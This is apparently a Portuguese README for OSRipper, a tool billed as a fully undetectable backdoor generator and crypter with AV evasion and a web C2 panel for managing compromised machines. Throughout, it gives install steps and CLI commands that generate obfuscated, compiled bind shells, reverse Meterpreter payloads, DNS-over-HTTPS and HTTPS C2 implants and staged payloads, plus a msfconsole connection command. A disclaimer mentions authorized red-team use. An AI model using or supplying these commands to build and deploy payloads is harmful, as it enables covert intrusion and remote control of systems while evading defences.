
Framework de Backdoor e Crypter multiplataforma com evasão de AV e webUI leve integrada

Gerador de payload e crypter avançado multiplataforma com capacidades FUD
Funcionalidades • Início Rápido • Interface Web • Tipos de Payload • Documentação
OSRipper é um gerador de backdoors e crypter sofisticado, totalmente indetectável (FUD), projetado para testes de penetração autorizados e operações de equipe vermelha. Apresenta técnicas avançadas de evasão, múltiplos tipos de payload e uma interface C2 moderna baseada na web para gerenciar sistemas comprometidos.
| Tipo de Payload | Descrição | Caso de Uso |
|---|---|---|
| Bind Shell | Abre uma porta na máquina alvo | Acesso direto quando conexões reversas estão bloqueadas |
| Reverse TCP Meterpreter | Conexão reversa criptografada com SSL/TLS | Teste de penetração padrão |
| DNS-over-HTTPS C2 | C2 furtivo baseado em DoH | Bypass de restrições de rede |
| HTTPS C2 | C2 HTTPS com fixação de certificado | Canal C2 seguro e autenticado |
| Payload Estagiado | Entrega web em múltiplos estágios | Implantação furtiva aprimorada |
| Crypter de Código Personalizado | Ofusca qualquer script Python | Criptografia de payload personalizada |
# Clonar repositório
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
# Instalar dependências
pip3 install -r requirements.txt
# Instalar pacote
pip3 install -e .
Importante — execute a configuração para funcionalidades opcionais (ngrok, compilação binária):
Em muitos sistemas (especialmente Linux com ambiente Python gerenciado externamente), você deve executar a configuração integrada para que as dependências opcionais sejam instaladas no venv do OSRipper. Faça isso uma vez após a instalação:
osripper-cli setup
Isso cria ~/.local/share/osripper/venv, instala pyngrok, nuitka e sandboxed lá, e todas as execuções posteriores de osripper / osripper-cli os usarão automaticamente. Sem isso, --ngrok e --compile solicitarão que você execute a configuração. Use osripper-cli setup --system somente se preferir uma instalação pip de sistema/usuário em vez do venv.
Modo Interativo:
osripper
# ou
python3 -m osripper
Linha de Comando:
# Gerar reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
# Gerar payload DoH C2
osripper-cli doh -d example.com --obfuscate --compile
Interface Web:
# Iniciar servidor C2 com interface web
python -m osripper.c2.server example.com --port 5000
# Acessar painel em http://localhost:5000
OSRipper inclui uma interface C2 moderna baseada na web para gerenciar sistemas comprometidos.
# Uso básico
python -m osripper.c2.server example.com
# Com HTTPS
python -m osripper.c2.server example.com --https
# Porta personalizada
python -m osripper.c2.server example.com --port 8080
# Com certificado personalizado
python -m osripper.c2.server example.com --https --cert server.crt --key server.key
Quando o servidor estiver em execução, acesse o painel em:
http://localhost:5000https://localhost:5000 (se ativado)Abre uma porta na máquina alvo e aguarda conexões.
osripper-cli bind -p 4444 --obfuscate --compile
Conexão:
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'
Conexão reversa criptografada com SSL/TLS.
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile
Canal C2 furtivo usando o protocolo DNS-over-HTTPS. Contorna muitas restrições de rede.
# Gerar payload
osripper-cli doh -d example.com --obfuscate --compile
# Iniciar servidor C2
python -m osripper.c2.server example.com
Funcionalidades:
C2 HTTPS segura com fixação de certificado para autenticação.
# Gerar payload (via interface web ou linha de comando)
# Iniciar servidor C2 com HTTPS
python -m osripper.c2.server example.com --https
# Obter impressão digital do certificado
curl http://localhost:5000/api/cert-fingerprint
Funcionalidades:
Entrega web em múltiplos estágios para furtividade aprimorada.
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate